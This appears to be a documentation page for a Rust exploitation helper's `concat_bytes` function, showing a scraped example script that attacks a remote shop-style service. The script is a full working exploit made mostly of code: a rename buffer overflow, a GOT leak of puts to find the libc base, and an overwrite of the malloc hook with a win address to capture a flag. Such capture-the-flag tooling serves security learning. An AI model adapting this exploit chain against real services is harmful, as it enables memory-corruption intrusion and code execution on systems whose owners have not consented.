pub fn concat_bytes(l: &[u8], r: &[u8]) -> Vec<u8>
Examples found in repository?
examples/ficticious.rs (lines 55-58)
/// Scraped usage example for `concat_bytes`: each call joins a fixed-length run of
/// `b'A'` filler to a 64-bit address packed little-endian by `p64`.
///
/// The script drives a remote service through helpers named `buy_item`,
/// `rename_item` and `list_items`. The service is not part of this listing, so
/// every remark below about its memory layout is an inference, not a fact.
///
/// # Panics
///
/// Every connection, read and UTF-8 decoding step is unwrapped, and `names[..]`
/// is indexed directly, so any failure or unexpected reply aborts the run.
fn main() {
    let mut conn = TcpStream::connect("some.vulnerable.server:42069").unwrap();

    buy_item(&mut conn, 1);
    buy_item(&mut conn, 3);

    // NOTE(review): the 0x29- and 0x20-byte filler lengths presumably track a name
    // buffer size in the target. A length check on the new name in the service's
    // rename handler is the control this sequence depends on being absent.
    rename_item(&mut conn, b"Sword", bytes!(b'A' * 0x29));
    let got_name = concat_bytes(
        bytes!(b'A' * 0x20),
        &p64(GOT_PUTS_ADDR, pwn_helper::Endianness::Little),
    );
    rename_item(&mut conn, b"AAAA", &got_name);

    let item_names = list_items(&mut conn);

    // The second listed name is decoded as a little-endian 64-bit value
    // (`ljust` presumably pads it with 0 up to 8 bytes) and rebased against the
    // known offset constant.
    let leaked_puts = u64(&ljust(&item_names[1], 0, 8), pwn_helper::Endianness::Little);
    let libc_base = leaked_puts - DYN_LIBC_PUTS_ADDR;
    log::info!("Libc Base: {:#x}", libc_base);

    let hook_addr = libc_base + DYN_LIBC_MALLOC_HOOK_ADDR;
    rename_item(&mut conn, &item_names[0], b"AA");
    rename_item(&mut conn, b"AA", bytes!(b'A' * 0x29));
    let hook_name = concat_bytes(
        bytes!(b'A' * 0x20),
        &p64(hook_addr, pwn_helper::Endianness::Little),
    );
    rename_item(&mut conn, b"A", &hook_name);

    // Author's note: the malloc hook is still a NULL pointer at this point, which is
    // presumably why the item is addressed by an empty name.
    // NOTE(review): glibc 2.34 and later no longer call the malloc hooks, so this
    // stage presumably assumes an older libc on the target.
    let win_bytes = p64(WIN_ADDR, pwn_helper::Endianness::Little);
    rename_item(&mut conn, b"", &win_bytes);
    conn.receive_until(b"> ", false).unwrap();

    // Read up to the closing brace and print the captured text.
    let raw_flag = conn.receive_until(b"}", false).unwrap();
    let flag = String::from_utf8(raw_flag).unwrap();
    println!("Flag: {}", flag);
}